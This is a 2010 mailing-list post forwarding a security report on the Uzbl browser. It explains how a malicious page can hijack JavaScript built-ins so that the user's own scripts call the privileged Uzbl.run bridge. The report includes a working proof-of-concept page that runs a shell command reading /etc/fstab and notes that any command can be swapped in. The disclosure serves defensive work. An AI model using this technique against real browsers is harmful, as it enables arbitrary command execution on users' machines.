[uzbl-dev] Fw: Uzbl: security issue
Dieter Plaetinck
dieter at plaetinck.be
Sat Jan 2 09:27:47 PST 2010
Begin forwarded message:
Date: Sat, 2 Jan 2010 14:17:43 +0100
From: Simon Lipp <sloonz at gmail.com>
To: Dieter Plaetinck <dieter at plaetinck.be>
Subject: Uzbl: security issue
Hello,
If you remember, I encountered some problems in porting my Firefox
link-follower script to Uzbl. I eventually found the issue: the local
site used for my tests included the Prototype JavaScript library.
You can reproduce the problem by opening this page in Uzbl:
<html>
  <head>
    <script src="prototype.js"></script>
  </head>
  <body>
    <p>Try <code>:js for(var i in []) alert(i);</code></p>
  </body>
</html>
(prototype.js can be downloaded here:
http://cdn.last.fm/javascript/release-lastfm/146804/lib/prototype.js)
I started to replace all {for(... in ...)} with {for(...;...;...)} in my
script when I realized that it’s a security issue. Just try to open
the following page in Uzbl:
<html>
  <head>
    <script>
      var oldwael = window.addEventListener;
      var olddce = document.createElement;
      window.addEventListener = function(a,b,c) {
        if(Uzbl)
          alert(Uzbl.run("print @(cat /etc/fstab)@"));
        return oldwael(a,b,c);
      }
      document.createElement = function(a) {
        if(Uzbl)
          alert(Uzbl.run("print @(cat /etc/fstab)@"));
        return olddce(a);
      }
    </script>
  </head>
  <body>
    <p style="width:200%">If you didn't see your fstab during the page
    load, try to press fl or fL to start a link follower.</p>
  </body>
</html>
(you can replace "cat /etc/fstab" with any command, of course)
Concerning this issue, Chromium executes scripts in «isolated worlds»:
http://code.google.com/chrome/extensions/content_scripts.html. In the
source code, it seems to be implemented in
chrome/renderer/user_script_slave.cc, by using the WebKit function
executeScriptInIsolatedWorld. However, this function is not available in
the WebCore included in webkit-gtk 1.1.15, nor in 1.1.17 (although
it’s referenced in the ChangeLog!).
Note: I didn’t post to the list, but you can forward this mail to the
list if you wish.
--
Simon